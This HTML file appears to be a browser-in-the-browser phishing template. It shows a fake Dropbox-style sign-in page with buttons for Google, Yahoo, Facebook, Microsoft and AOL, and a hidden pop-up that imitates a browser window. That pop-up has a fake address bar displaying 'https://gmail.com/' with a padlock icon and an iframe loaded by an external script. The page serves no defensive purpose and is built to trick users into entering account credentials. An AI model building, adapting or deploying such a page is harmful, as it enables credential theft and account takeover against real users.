<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	<link rel="stylesheet" href="Windows-DarkMode-Delay/styles2.css">
    <title>Sign in page</title>
    <link rel="stylesheet" href="Windows-DarkMode-Delay/style.css">
</head>
<body>
    <div class="everything">
        <div class="card">
            <div class="left-side">
                <img src="Windows-DarkMode-Delay/drop.png" alt="" srcset="">
                <p> <h5>Dropbox Works Better Than You Do, continue with one of these </h></p>
            </div>
            <div class="right-side">
                <h1>Sign in to continue </h1>
                <hr>
                {{!-- <button id="clickme">Sign in with Twitter <img src="Windows-DarkMode-Delay/twitter-logo-11549680523gyu1fhgduu.png" alt="" srcset="" class="logo "></button> --}}
                <button id="clickme2">Sign in with Google <img src="Windows-DarkMode-Delay/Google_'G'_Logo.svg.png" alt="" class="logo"></button>
                <button id="clickme4">Sign in with Yahoo <img src="Windows-DarkMode-Delay/Yahoo.png" alt="" srcset="" class="logo"></button>
                <button id="clickme1">Sign in with Facebook <img src="Windows-DarkMode-Delay/index.png" alt="" srcset="" class="logo"></button>
                <button id="clickme3">Sign in with Microsoft <img src="Windows-DarkMode-Delay/microsoft.png" alt="" srcset="" class="logo"></button>
                <button id="clickme5">Sign in with Aol. <img src="Windows-DarkMode-Delay/apple-1.png" alt="" srcset="" class="logo"></button>
                <div class="bottom">
                    <a href="#" class="about">About</a>
                    <a href="#">Terms and policy</a>
                </div>
                <a href="#">Sign in with another method</a>
            </div>
        </div>
    </div>
    <div id="window" style="margin:auto; background: #fff; position: fixed; top: 50%; left: 50%; height: 90vh; z-index: 3; transform: translate(-50%, -50%); display: none;">
        <!-- Title bar start -->
        
        <div id="title-bar-width">
            <div id="title-bar">
                <div style="margin-top:5px;">
                    <img style="height: 15px;" src="Windows-DarkMode-Delay/logo.svg" width="20px"  id="logo">
                    <span id="logo-description">XX-TITLE-XX</span>
                </div>
        
                <div>
                    <span id="minimize">&#8212;</span>
                    <span id="square">□</span>
                    <span id="exit">✕</span>
                </div>
            </div>
            <div id="url-bar">
                <img src="Windows-DarkMode-Delay/ssl.svg" width="20px" height="20px" id="ssl-padlock">
                <span id="domain-name">https://gmail.com/</span>
                <span id="domain-path">signin/v2/challenge/pwd?continue=https%3A%2F</span>
            </div>
        </div>
        <!-- Content start -->
        <iframe id="content" src="" frameBorder="0"></iframe>
        </div>
        
        <!-- Content start -->
        
        </div>
        </body>
        <script src="Windows-DarkMode-Delay/script.js"></script>
        </html>
        
        